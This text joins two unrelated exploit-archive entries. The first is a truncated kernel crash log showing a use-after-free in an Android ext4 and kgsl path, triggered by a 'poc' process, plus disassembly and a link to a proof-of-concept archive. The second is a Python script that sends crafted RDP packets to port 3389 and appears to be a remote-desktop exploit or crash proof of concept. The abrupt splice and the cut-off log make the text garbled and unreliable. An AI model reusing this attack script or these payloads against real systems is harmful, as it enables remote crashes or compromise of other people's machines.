<4>[  447.473017] c3   2621 [<ffffffa689edc124>] process_one_work+0x254/0x78c
<4>[  447.479093] c3   2621 [<ffffffa689edc6f4>] worker_thread+0x98/0x718
<4>[  447.485551] c3   2621 [<ffffffa689ee59a4>] kthread+0x114/0x130
<4>[  447.491801] c3   2621 [<ffffffa689e84250>] ret_from_fork+0x10/0x40
<3>[  447.497696] c3   2621 
<3>[  447.503818] c3   2621 Allocated by task 2684:
<4>[  447.506206] c3   2621  [<ffffffa689e8d624>] save_stack_trace_tsk+0x0/0x1b8
<4>[  447.511847] c3   2621  [<ffffffa689e8d7f4>] save_stack_trace+0x18/0x20
<4>[  447.517829] c3   2621  [<ffffffa68a079e74>] kasan_kmalloc.part.5+0x50/0x124
<4>[  447.523494] c3   2621  [<ffffffa68a07a198>] kasan_kmalloc+0xc4/0xe4
<4>[  447.529547] c3   2621  [<ffffffa68a07a964>] kasan_slab_alloc+0x14/0x1c
<4>[  447.534931] c3   2621  [<ffffffa68a078030>] kmem_cache_alloc+0x144/0x27c
<4>[  447.540572] c3   2621  [<ffffffa68a187bdc>] ext4_alloc_inode+0x28/0x234
<4>[  447.546387] c3   2621  [<ffffffa68a0afe94>] alloc_inode+0x34/0xd0
<4>[  447.552112] c3   2621  [<ffffffa68a0b19e8>] new_inode+0x20/0xe8
<4>[  447.557318] c3   2621  [<ffffffa68a154214>] __ext4_new_inode+0xe8/0x1f00
<4>[  447.562360] c3   2621  [<ffffffa68a17087c>] ext4_tmpfile+0xb4/0x230
<4>[  447.568172] c3   2621  [<ffffffa68a09f9e8>] path_openat+0x934/0x1404
<4>[  447.573556] c3   2621  [<ffffffa68a0a1a50>] do_filp_open+0x98/0x188
<4>[  447.579027] c3   2621  [<ffffffa68a089004>] do_sys_open+0x170/0x2d4
<4>[  447.584407] c3   2621  [<ffffffa68a0891a0>] SyS_openat+0x10/0x18
<4>[  447.589787] c3   2621  [<ffffffa689e842b0>] el0_svc_naked+0x24/0x28
<3>[  447.594909] c3   2621 
<3>[  447.599065] c3   2621 Freed by task 36:
<4>[  447.601330] c3   2621  [<ffffffa689e8d624>] save_stack_trace_tsk+0x0/0x1b8
<4>[  447.606461] c3   2621  [<ffffffa689e8d7f4>] save_stack_trace+0x18/0x20
<4>[  447.612450] c3   2621  [<ffffffa68a07aa1c>] kasan_slab_free+0xb0/0x1c0
<4>[  447.618091] c3   2621  [<ffffffa68a0770c0>] kmem_cache_free+0x80/0x2f8
<4>[  447.623733] c3   2621  [<ffffffa68a1863f8>] ext4_i_callback+0x18/0x20
<4>[  447.629363] c3   2621  [<ffffffa689f5c430>] rcu_nocb_kthread+0x20c/0x264
<4>[  447.634926] c3   2621  [<ffffffa689ee59a4>] kthread+0x114/0x130
<4>[  447.640726] c3   2621  [<ffffffa689e84250>] ret_from_fork+0x10/0x40
<3>[  447.645765] c3   2621 
<3>[  447.649913] c3   2621 The buggy address belongs to the object at 0000000000000000
<3>[  447.649913] c3   2621  which belongs to the cache ext4_inode_cache of size 1048
<3>[  447.652315] c3   2621 The buggy address is located 680 bytes inside of
<3>[  447.652315] c3   2621  1048-byte region [0000000000000000, 0000000000000000)
<3>[  447.667170] c3   2621 The buggy address belongs to the page:
<1>[  447.680933] c3   2621 Unable to handle kernel paging request at virtual address ffffffd8929b3000
<1>[  447.686392] c3   2621 pgd = 0000000000000000
<1>[  447.695099] c3   2621 [ffffffd8929b3000] *pgd=0000000000000000, *pud=0000000000000000
<4>[  447.706506] c3   2621 ------------[ cut here ]------------
<2>[  447.706664] c3   2621 Kernel BUG at 0000000000000000 [verbose debug info unavailable]
<0>[  447.711676] c3   2621 Internal error: Oops - BUG: 96000047 [#1] PREEMPT SMP
<4>[  447.719517] c3   2621 Modules linked in:
<4>[  447.729365] c3   2621 CPU: 3 PID: 2621 Comm: kworker/3:3 Not tainted 4.4.116-gbcd0ecccd040-dirty #45
<4>[  447.729573] c3   2621 Hardware name: Qualcomm Technologies, Inc. MSM8998 v2.1 (DT)
<4>[  447.738760] c3   2621 Workqueue: kgsl-mementry _deferred_put
<4>[  447.750779] c3   2621 task: 0000000000000000 task.stack: 0000000000000000
<4>[  447.750972] c3   2621 PC is at el1_sync+0x28/0xe0
<4>[  447.757719] c3   2621 LR is at dump_page+0x10/0x18
<4>[  447.762390] c3   2621 pc : [<ffffffa689e836e8>] lr : [<ffffffa68a04d9dc>] pstate: 204003c5
<4>[  447.767106] c3   2621 sp : ffffffd8929b2f60
<4>[  447.775306] c3   2621 x29: ffffffd8929b4000 x28: ffffffd88e9a47d0 
<4>[  447.784631] c3   2621 x27: ffffffd8294fab80 x26: ffffffa68ba1f000 
<4>[  447.789927] c3   2621 x25: ffffffd8536fc908 x24: ffffffd8536fc4e8 
<4>[  447.795219] c3   2621 x23: ffffffd892e55500 x22: 0000000000000001 
<4>[  447.800513] c3   2621 x21: ffffffa68ba1aa00 x20: 0000000000000000 
<4>[  447.805809] c3   2621 x19: ffffffbe214dbe00 x18: 0000007f7dc4ef8a 
<4>[  447.811105] c3   2621 x17: 0000007f809eb0e0 x16: ffffffa68a0a5178 
<4>[  447.816400] c3   2621 x15: 0000000000000021 x14: 202c303030303030 
<4>[  447.821694] c3   2621 x13: 3030303030303030 x12: e95cc056ac940c73 
<4>[  447.826992] c3   2621 x11: ffffffd8929fb810 x10: ffffff8b12978008 
<4>[  447.832286] c3   2621 x9 : ffffff8b12978007 x8 : ffffffa68a21a558 
<4>[  447.837590] c3   2621 x7 : ffffffa68c69ec28 x6 : 0000000000000040 
<4>[  447.842872] c3   2621 x5 : 0000000000000000 x4 : ffffff87c429b7c0 
<4>[  447.848170] c3   2621 x3 : ffffffa68a04d8dc x2 : 0000000000000000 
<4>[  447.853468] c3   2621 x1 : ffffffa68ba1aa00 x0 : ffffffbe214dbe00 
<4>[  447.858765] c3   2621 
<4>[  447.858765] c3   2621 PC: 0xffffffa689e836a8:
<4>[  447.859009] c3   2621 36a8  d503201f d503201f d503201f d503201f d503201f d503201f a90007e0 a9010fe2
<4>[  447.873684] c3   2621 36c8  a90217e4 a9031fe6 a90427e8 a9052fea a90637ec a9073fee a90847f0 a9094ff2
<4>[  447.881847] c3   2621 36e8  a90a57f4 a90b5ff6 a90c67f8 a90d6ffa a90e77fc 9104c3f5 d538411c f9400794
<4>[  447.890005] c3   2621 3708  f90093f4 d2c01014 f9000794 d5384036 d5384017 a90f57fe d503201f d5382015
<4>[  447.898172] c3   2621 
<4>[  447.898172] c3   2621 LR: 0xffffffa68a04d99c:
<4>[  447.898371] c3   2621 d99c  b000ce80 9113e000 97feface aa1303e0 9400affc f9400260 9117e2e1 528002a2
<4>[  447.913008] c3   2621 d9bc  9106c021 8a000280 97ffff2c 17ffffe6 a9bf7bfd d2800002 910003fd 97ffffb4
<4>[  447.921170] c3   2621 d9dc  a8c17bfd d65f03c0 a9ac7bfd 910003fd a90153f3 a9025bf5 a90363f7 a9046bf9
<4>[  447.929328] c3   2621 d9fc  a90573fb d10443ff aa0003f3 9400afe5 aa1303e0 f8410402 f90033a2 9400af97
<4>[  447.937494] c3   2621 
<4>[  447.937494] c3   2621 SP: 0xffffffd8929b2f20:
<4>[  447.937693] c3   2621 2f20  8a04d9dc ffffffa6 929b2f60 ffffffd8 89e836e8 ffffffa6 204003c5 00000000
<4>[  447.952331] c3   2621 2f40  00000000 00000000 00000000 00000000 ffffffff ffffffff 00000000 00000000
<4>[  447.960491] c3   2621 2f60  214dbe00 ffffffbe 8ba1aa00 ffffffa6 00000000 00000000 8a04d8dc ffffffa6
<4>[  447.968651] c3   2621 2f80  c429b7c0 ffffff87 00000000 00000000 00000040 00000000 8c69ec28 ffffffa6
<4>[  447.976809] c3   2621 
<0>[  447.976941] c3   2621 Process kworker/3:3 (pid: 2621, stack limit = 0x0000000000000000)
<4>[  447.979247] c3   2621 Call trace:
<4>[  447.987122] c3   2621 Exception stack(0xffffffd8929b2d60 to 0xffffffd8929b2e90)
<4>[  447.990662] c3   2621 2d60: ffffffbe214dbe00 0000008000000000 00000000836e2000 ffffffa689e836e8
<4>[  447.997788] c3   2621 2d80: 00000000204003c5 0000000000000025 ffffffd8536fc908 0000000000000000
<4>[  448.006468] c3   2621 2da0: 0000000000000000 0000000000000000 0000000000000000 0000000000000000
<4>[  448.015098] c3   2621 2dc0: 0000000000000000 0000000000000000 0000000000000000 0000000000000000
<4>[  448.023777] c3   2621 2de0: 0000000000000000 0000000000000000 0000000000000000 0000000000000000
<4>[  448.032461] c3   2621 2e00: 0000000000000000 0000000000000000 0000000000000000 0000000000000000
<4>[  448.041195] c3   2621 2e20: 0000000000000000 e95cc056ac940c73 ffffffbe214dbe00 ffffffa68ba1aa00
<4>[  448.049872] c3   2621 2e40: 0000000000000000 ffffffa68a04d8dc ffffff87c429b7c0 0000000000000000
<4>[  448.058561] c3   2621 2e60: 0000000000000040 ffffffa68c69ec28 ffffffa68a21a558 ffffff8b12978007
<4>[  448.067216] c3   2621 2e80: ffffff8b12978008 ffffffd8929fb810
<4>[  448.075867] c3   2621 [<ffffffa689e836e8>] el1_sync+0x28/0xe0
<0>[  448.081787] c3   2621 Code: a90637ec a9073fee a90847f0 a9094ff2 (a90a57f4) 
<4>[  448.087496] c3   2621 ---[ end trace 8d4b2347f8b71fe7 ]---
<4>[  448.087540] c4   2684 ------------[ cut here ]------------
<2>[  448.087544] c4   2684 Kernel BUG at 0000000000000000 [verbose debug info unavailable]
<0>[  448.087547] c4   2684 Internal error: Oops - BUG: 96000005 [#2] PREEMPT SMP
<4>[  448.087553] c4   2684 Modules linked in:
<4>[  448.087561] c4   2684 CPU: 4 PID: 2684 Comm: poc Tainted: G      D         4.4.116-gbcd0ecccd040-dirty #45
<4>[  448.087563] c4   2684 Hardware name: Qualcomm Technologies, Inc. MSM8998 v2.1 (DT)
<4>[  448.087565] c4   2684 task: 0000000000000000 task.stack: 0000000000000000
<4>[  448.087578] c4   2684 PC is at qlist_free_all+0x3c/0x80
<4>[  448.087581] c4   2684 LR is at qlist_free_all+0x7c/0x80
<4>[  448.087585] c4   2684 pc : [<ffffffa68a07bbbc>] lr : [<ffffffa68a07bbfc>] pstate: 60400145
<4>[  448.087586] c4   2684 sp : ffffffd87e3b3880
<4>[  448.087591] c4   2684 x29: ffffffd87e3b3880 x28: ffffffa68ca1a000 
<4>[  448.087595] c4   2684 x27: 000000000591e848 x26: ffffffd87e3b3920 
<4>[  448.087598] c4   2684 x25: 0000000000000140 x24: 0000000000000000 
<4>[  448.087601] c4   2684 x23: ffffffd87e3b3920 x22: ffffffa68a07bbbc 
<4>[  448.087604] c4   2684 x21: 0000000000000000 x20: ffffffd8929f8040 
<4>[  448.087607] c4   2684 x19: ffffffd8929f8040 x18: 00000000c8056d20 
<4>[  448.087611] c4   2684 x17: 000000002c754130 x16: 0000000085837409 
<4>[  448.087613] c4   2684 x15: 00000000a50d5ad3 x14: 0000000000000000 
<4>[  448.087617] c4   2684 x13: 0000000001075000 x12: ffffffffffffffff 
<4>[  448.087620] c4   2684 x11: 0000000000000040 x10: ffffff8b0fc76746 
<4>[  448.087623] c4   2684 x9 : ffffff8b0fc76745 x8 : ffffffd87e3b3a2b 
<4>[  448.087626] c4   2684 x7 : 0000000000000000 x6 : ffffffd87e3b3a08 
<4>[  448.087629] c4   2684 x5 : fffffffffe8c0000 x4 : 0000000000000000 
<4>[  448.087632] c4   2684 x3 : ffffffd8929f7ff0 x2 : 0000000000000000 
<4>[  448.087635] c4   2684 x1 : dead0000000000ff x0 : 0000000000000000 
<4>[  448.087637] c4   2684 
<4>[  448.087637] c4   2684 PC: 0xffffffa68a07bb7c:
<4>[  448.087646] c4   2684 bb7c  17fffff1 a9bc7bfd 910003fd a90153f3 a9025bf5 f9001bf7 f9400013 b4000253
<4>[  448.087655] c4   2684 bb9c  90000016 aa0103f5 aa0003f7 912ef2d6 14000002 aa1403f3 aa1503e0 b40001f5
<4>[  448.087664] c4   2684 bbbc  b980c401 aa1603e2 f9400274 cb010261 97fff36f b5ffff14 f90006ff f90002ff
<4>[  448.087673] c4   2684 bbdc  f9000aff a94153f3 a9425bf5 f9401bf7 a8c47bfd d65f03c0 aa1303e0 97ffff93
<4>[  448.087675] c4   2684 
<4>[  448.087675] c4   2684 LR: 0xffffffa68a07bbbc:
<4>[  448.087684] c4   2684 bbbc  b980c401 aa1603e2 f9400274 cb010261 97fff36f b5ffff14 f90006ff f90002ff
<4>[  448.087692] c4   2684 bbdc  f9000aff a94153f3 a9425bf5 f9401bf7 a8c47bfd d65f03c0 aa1303e0 97ffff93
<4>[  448.087701] c4   2684 bbfc  17fffff0 a9bc7bfd aa0003e2 910003fd a90153f3 f0012ed3 aa0003f4 b000eb40
<4>[  448.087711] c4   2684 bc1c  910083a1 d538d083 913c8000 f90013bf 8b000060 f9452a63 f9001fa3 f90017bf
<4>[  448.087712] c4   2684 
<4>[  448.087712] c4   2684 SP: 0xffffffd87e3b3840:
<4>[  448.087722] c4   2684 3840  8a07bbfc ffffffa6 7e3b3880 ffffffd8 8a07bbbc ffffffa6 60400145 00000000
<4>[  448.087731] c4   2684 3860  7e3b3920 ffffffd8 00000000 00000000 00000000 00000080 8b4ddfd0 ffffffa6
<4>[  448.087740] c4   2684 3880  7e3b38c0 ffffffd8 8a07bf9c ffffffa6 8c656000 ffffffa6 8ca1f500 ffffffa6
<4>[  448.087749] c4   2684 38a0  8ca1a000 ffffffa6 000000f7 00000000 8c68d000 ffffffa6 fabb3a00 ffffffd7
<4>[  448.087750] c4   2684 
<0>[  448.087753] c4   2684 Process poc (pid: 2684, stack limit = 0x0000000000000000)
<4>[  448.087754] c4   2684 Call trace:
<4>[  448.087758] c4   2684 Exception stack(0xffffffd87e3b3680 to 0xffffffd87e3b37b0)
<4>[  448.087763] c4   2684 3680: ffffffd8929f8040 0000008000000000 00000000836e2000 ffffffa68a07bbbc
<4>[  448.087768] c4   2684 36a0: 0000000060400145 0000000000000025 0000000000000140 ffffffd7fabb3a00
<4>[  448.087773] c4   2684 36c0: 0000000000000000 ffffffd87e3b37d0 ffffffd87e3b3720 ffffffa68a0768e0
<4>[  448.087779] c4   2684 36e0: ffffffbe224a7d80 0000000000000000 ffffffd7fabb3a00 ffffffd7fabb3a00
<4>[  448.087784] c4   2684 3700: 0000000100150015 ffffffd8929f7e00 0000000180150014 ffffffd899803b00
<4>[  448.087789] c4   2684 3720: ffffffd87e3b3830 ffffffa68a078b38 ffffffbe224a7d80 ffffffd8929f7ff0
<4>[  448.087794] c4   2684 3740: ffffffd7fabb3a00 e95cc056ac940c73 0000000000000000 dead0000000000ff
<4>[  448.087799] c4   2684 3760: 0000000000000000 ffffffd8929f7ff0 0000000000000000 fffffffffe8c0000
<4>[  448.087804] c4   2684 3780: ffffffd87e3b3a08 0000000000000000 ffffffd87e3b3a2b ffffff8b0fc76745
<4>[  448.087808] c4   2684 37a0: ffffff8b0fc76746 0000000000000040
<4>[  448.087813] c4   2684 [<ffffffa68a07bbbc>] qlist_free_all+0x3c/0x80
<4>[  448.087819] c4   2684 [<ffffffa68a07bf9c>] quarantine_reduce+0x17c/0x1a0
<4>[  448.087824] c4   2684 [<ffffffa68a07a1b4>] kasan_kmalloc+0xe0/0xe4
<4>[  448.087828] c4   2684 [<ffffffa68a07a964>] kasan_slab_alloc+0x14/0x1c
<4>[  448.087832] c4   2684 [<ffffffa68a078030>] kmem_cache_alloc+0x144/0x27c
<4>[  448.087840] c4   2684 [<ffffffa68a15d0dc>] ext4_inode_attach_jinode+0x9c/0x118
<4>[  448.087844] c4   2684 [<ffffffa68a150d74>] ext4_file_open+0xc8/0x21c
<4>[  448.087848] c4   2684 [<ffffffa68a087488>] do_dentry_open+0x350/0x4ec
<4>[  448.087851] c4   2684 [<ffffffa68a087930>] finish_open+0x74/0xa8
<4>[  448.087857] c4   2684 [<ffffffa68a09fa34>] path_openat+0x980/0x1404
<4>[  448.087861] c4   2684 [<ffffffa68a0a1a50>] do_filp_open+0x98/0x188
<4>[  448.087866] c4   2684 [<ffffffa68a089004>] do_sys_open+0x170/0x2d4
<4>[  448.087869] c4   2684 [<ffffffa68a0891a0>] SyS_openat+0x10/0x18
<4>[  448.087875] c4   2684 [<ffffffa689e842b0>] el0_svc_naked+0x24/0x28
<0>[  448.087881] c4   2684 Code: 14000002 aa1403f3 aa1503e0 b40001f5 (b980c401) 
<4>[  448.087944] c4   2684 ---[ end trace 8d4
==================================

The KASAN report points to instruction 267c in the following assembly:

==================================
0000000000002630 <set_page_dirty>:
{
    2630:       a9bd7bfd        stp     x29, x30, [sp, #-48]!
    2634:       910003fd        mov     x29, sp
    2638:       a90153f3        stp     x19, x20, [sp, #16]
    263c:       f90013f5        str     x21, [sp, #32]
    2640:       aa0003f3        mov     x19, x0
        struct address_space *mapping = page_mapping(page);
    2644:       94000000        bl      0 <page_mapping>
    2648:       aa0003f4        mov     x20, x0
    264c:       d5384115        mrs     x21, sp_el0
        if (current->jh_task_flags && mapping)
    2650:       9128a2a0        add     x0, x21, #0xa28
    2654:       94000000        bl      0 <__asan_load4>
    2658:       b94a2aa0        ldr     w0, [x21, #2600]
    265c:       340000a0        cbz     w0, 2670 <set_page_dirty+0x40>
    2660:       b40003b4        cbz     x20, 26d4 <set_page_dirty+0xa4>
                msleep(500);
    2664:       52803e80        mov     w0, #0x1f4                      // #500
    2668:       94000000        bl      0 <msleep>
    266c:       14000002        b       2674 <set_page_dirty+0x44>
        if (likely(mapping)) {
    2670:       b4000334        cbz     x20, 26d4 <set_page_dirty+0xa4>
                int (*spd)(struct page *) = mapping->a_ops->set_page_dirty;
    2674:       9101a280        add     x0, x20, #0x68
    2678:       94000000        bl      0 <__asan_load8>
    267c:       f9403694        ldr     x20, [x20, #104]
    2680:       91006280        add     x0, x20, #0x18
    2684:       94000000        bl      0 <__asan_load8>
    2688:       f9400e94        ldr     x20, [x20, #24]
    268c:       aa1303e0        mov     x0, x19
    2690:       94000000        bl      0 <__asan_load8>
    2694:       f9400260        ldr     x0, [x19]
==================================


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46941.zip
            
import socket, sys, struct
from OpenSSL import SSL
from impacket.structure import Structure

# I'm not responsible for what you use this to accomplish and should only be used for education purposes

# Could clean these up since I don't even use them
class TPKT(Structure):
	commonHdr = (
		('Version','B=3'),
		('Reserved','B=0'),
		('Length','>H=len(TPDU)+4'),
		('_TPDU','_-TPDU','self["Length"]-4'),
		('TPDU',':=""'),
	)

class TPDU(Structure):
	commonHdr = (
		('LengthIndicator','B=len(VariablePart)+1'),
		('Code','B=0'),
		('VariablePart',':=""'),
	)
	def __init__(self, data = None):
		Structure.__init__(self,data)
		self['VariablePart']=''

class CR_TPDU(Structure):
	commonHdr = (
		('DST-REF','<H=0'),
		('SRC-REF','<H=0'),
		('CLASS-OPTION','B=0'),
		('Type','B=0'),
		('Flags','B=0'),
		('Length','<H=8'),
	)

class DATA_TPDU(Structure):
	commonHdr = (
		('EOT','B=0x80'),
		('UserData',':=""'),
	)
	def __init__(self, data = None):
		Structure.__init__(self,data)
		self['UserData'] =''

class RDP_NEG_REQ(CR_TPDU):
	structure = (
		('requestedProtocols','<L'),
	)
	def __init__(self,data=None):
		CR_TPDU.__init__(self,data)
		if data is None:
			self['Type'] = 1

def send_init_packets(host):
	tpkt = TPKT()
	tpdu = TPDU()
	rdp_neg = RDP_NEG_REQ()
	rdp_neg['Type'] = 1
	rdp_neg['requestedProtocols'] = 1
	tpdu['VariablePart'] = rdp_neg.getData()
	tpdu['Code'] = 0xe0
	tpkt['TPDU'] = tpdu.getData()
	s = socket.socket()
	s.connect((host, 3389))
	s.sendall(tpkt.getData())
	s.recv(8192)
	ctx = SSL.Context(SSL.TLSv1_METHOD)
	tls = SSL.Connection(ctx,s)
	tls.set_connect_state()
	tls.do_handshake()
	return tls

# This can be fixed length now buttfuckit
def send_client_data(tls):
	p = "\x03\x00\x01\xca\x02\xf0\x80\x7f\x65\x82\x07\xc2\x04\x01\x01\x04\x01\x01\x01\x01\xff\x30\x19\x02\x01\x22\x02\x01\x02\x02\x01\x00\x02\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\xff\xff\x02\x01\x02\x30\x19\x02\x01\x01\x02\x01\x01\x02\x01\x01\x02\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\x04\x20\x02\x01\x02\x30\x1c\x02\x02\xff\xff\x02\x02\xfc\x17\x02\x02\xff\xff\x02\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\xff\xff\x02\x01\x02\x04\x82\x01\x61\x00\x05\x00\x14\x7c\x00\x01\x81\x48\x00\x08\x00\x10\x00\x01\xc0\x00\x44\x75\x63\x61\x81\x34\x01\xc0\xea\x00\x0a\x00\x08\x00\x80\x07\x38\x04\x01\xca\x03\xaa\x09\x04\x00\x00\xee\x42\x00\x00\x44\x00\x45\x00\x53\x00\x4b\x00\x54\x00\x4f\x00\x50\x00\x2d\x00\x46\x00\x38\x00\x34\x00\x30\x00\x47\x00\x49\x00\x4b\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xca\x01\x00\x00\x00\x00\x00\x18\x00\x0f\x00\xaf\x07\x62\x00\x63\x00\x37\x00\x38\x00\x65\x00\x66\x00\x36\x00\x33\x00\x2d\x00\x39\x00\x64\x00\x33\x00\x33\x00\x2d\x00\x34\x00\x31\x00\x39\x38\x00\x38\x00\x2d\x00\x39\x00\x32\x00\x63\x00\x66\x00\x2d\x00\x00\x31\x00\x62\x00\x32\x00\x64\x00\x61\x00\x42\x42\x42\x42\x07\x00\x01\x00\x00\x00\x56\x02\x00\x00\x50\x01\x00\x00\x00\x00\x64\x00\x00\x00\x64\x00\x00\x00\x04\xc0\x0c\x00\x15\x00\x00\x00\x00\x00\x00\x00\x02\xc0\x0c\x00\x1b\x00\x00\x00\x00\x00\x00\x00\x03\xc0\x38\x00\x04\x00\x00\x00\x72\x64\x70\x73\x6e\x64\x00\x00\x0f\x00\x00\xc0\x63\x6c\x69\x70\x72\x64\x72\x00\x00\x00\xa0\xc0\x64\x72\x64\x79\x6e\x76\x63\x00\x00\x00\x80\xc0\x4d\x53\x5f\x54\x31\x32\x30\x00\x00\x00\x00\x00"
	size0 = struct.pack(">h", len(p))
	size1 = struct.pack(">h", len(p)-12)
	size2 = struct.pack(">h", len(p)-109)
	size3 = struct.pack(">h", len(p)-118)
	size4 = struct.pack(">h", len(p)-132)
	size5 = struct.pack(">h", len(p)-390)
	ba = bytearray()
	ba.extend(map(ord, p))
	ba[2] = size0[0]
	ba[3] = size0[1]
	ba[10] = size1[0]
	ba[11] = size1[1]
	ba[107] = size2[0]
	ba[108] = size2[1]
	ba[116] = 0x81
	ba[117] = size3[1] 
	ba[130] = 0x81
	ba[131] = size4[1]
	ba[392] = size5[1]
	tls.sendall(bytes(ba))
	tls.recv(8192)

def send_client_info(tls):
	p = b"\x03\x00\x01\x61\x02\xf0\x80\x64\x00\x07\x03\xeb\x70\x81\x52\x40\x00\xa1\xa5\x09\x04\x09\x04\xbb\x47\x03\x00\x00\x00\x0e\x00\x08\x00\x00\x00\x00\x00\x00\x00\x41\x00\x41\x00\x41\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00\x74\x00\x65\x00\x73\x00\x74\x00\x00\x00\x00\x00\x00\x00\x02\x00\x1c\x00\x31\x00\x39\x00\x32\x00\x2e\x00\x41\x41\x41\x00\x38\x00\x2e\x00\x32\x00\x33\x00\x32\x00\x2e\x00\x31\x00\x00\x00\x40\x00\x43\x00\x3a\x00\x5c\x00\x57\x00\x49\x00\x4e\x00\x41\x41\x41\x00\x57\x00\x53\x00\x5c\x00\x73\x00\x79\x00\x73\x00\x74\x00\x65\x00\x6d\x00\x33\x00\x32\x00\x5c\x00\x6d\x00\x73\x00\x74\x00\x73\x00\x63\x00\x61\x00\x78\x00\x2e\x00\x64\x00\x6c\x00\x6c\x00\x00\x00\xa4\x01\x00\x00\x4d\x00\x6f\x00\x75\x00\x6e\x00\x74\x00\x61\x00\x69\x00\x6e\x00\x20\x00\x53\x00\x74\x00\x61\x00\x6e\x00\x64\x00\x61\x00\x72\x00\x64\x00\x20\x00\x54\x00\x69\x00\x6d\x00\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4d\x00\x6f\x00\x75\x00\x6e\x00\x74\x00\x61\x00\x69\x00\x6e\x00\x20\x00\x44\x00\x61\x00\x79\x00\x6c\x00\x69\x00\x67\x00\x68\x00\x74\x00\x20\x00\x54\x00\x69\x00\x6d\x00\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00\xc4\xff\xff\xff\x01\x00\x00\x00\x06\x00\x00\x00\x00\x00\x64\x00\x00\x00"
	tls.sendall(p)

def send_channel_packets(tls):
	p1 = b"\x03\x00\x00\x0c\x02\xf0\x80\x04\x01\x00\x01\x00"
	tls.sendall(p1)
	p2 = b"\x03\x00\x00\x08\x02\xf0\x80\x28"
	tls.sendall(p2)
	tls.recv(1024)
	p4 = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x07\x03\xeb"
	tls.sendall(p4)
	tls.recv(1024)
	p5 = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x07\x03\xec"
	tls.sendall(p5)
	tls.recv(1024)
	p6 = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x07\x03\xed"
	tls.sendall(p6)
	tls.recv(1024)
	p7 = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x07\x03\xee"
	tls.sendall(p7)
	tls.recv(1024)
	p8 = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x07\x03\xef"
	tls.sendall(p8)
	tls.recv(1024)

def send_confirm_active(tls, shareid):
	p = ("\x03\x00\x02\x63\x02\xf0\x80\x64\x00\x07\x03\xeb\x70\x82\x54\x54\x02\x13\x00\xf0\x03\xea\x03\x01\x00\xea\x03\x06\x00\x3e\x02\x4d\x53\x54\x53\x43\x00\x17\x00\x00\x00\x01\x00\x18\x00\x01\x00\x03\x00\x00\x02\x00\x00\x00\x00\x1d\x04\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x1c\x00\x20\x00\x01\x00\x01\x00\x01\x00\x80\x07\x38\x04\x00\x00\x01\x00\x01\x00\x00\x1a\x01\x00\x00\x00\x03\x00\x58\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x14\x00\x00\x00\x01\x00\x00\x00\xaa\x00\x01\x01\x01\x01\x01\x00\x00\x01\x01\x01\x00\x01\x00\x00\x00\x01\x01\x01\x01\x01\x01\x01\x01\x00\x01\x01\x01\x00\x00\x00\x00\x00\xa1\x06\x06\x00\x00\x00\x00\x00\x00\x84\x03\x00\x00\x00\x00\x00\xe4\x04\x00\x00\x13\x00\x28\x00\x03\x00\x00\x03\x78\x00\x00\x00\x78\x00\x00\x00\xfc\x09\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x08\x00\x06\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x0c\x00\x00\x00\x00\x00\x02\x00\x02\x00\x08\x00\x0a\x00\x01\x00\x14\x00\x15\x00\x09\x00\x08\x00\x00\x00\x00\x00\x0d\x00\x58\x00\x91\x00\x20\x00\x09\x04\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x08\x00\x01\x00\x00\x00\x0e\x00\x08\x00\x01\x00\x00\x00\x10\x00\x34\x00\xfe\x00\x04\x00\xfe\x00\x04\x00\xfe\x00\x08\x00\xfe\x00\x08\x00\xfe\x00\x10\x00\xfe\x00\x20\x00\xfe\x00\x40\x00\xfe\x00\x80\x00\xfe\x00\x00\x01\x40\x00\x00\x08\x00\x01\x00\x01\x03\x00\x00\x00\x0f\x00\x08\x00\x01\x00\x00\x00\x11\x00\x0c\x00\x01\x00\x00\x00\x00\x28\x64\x00\x14\x00\x0c\x00\x01\x00\x00\x00\x00\x00\x00\x00\x15\x00\x0c\x00\x02\x00\x00\x00\x00\x0a\x00\x01\x1a\x00\x08\x00\xaf\x94\x00\x00\x1c\x00\x0c\x00\x12\x00\x00\x00\x00\x00\x00\x00\x1b\x00\x06\x00\x01\x00\x1e"
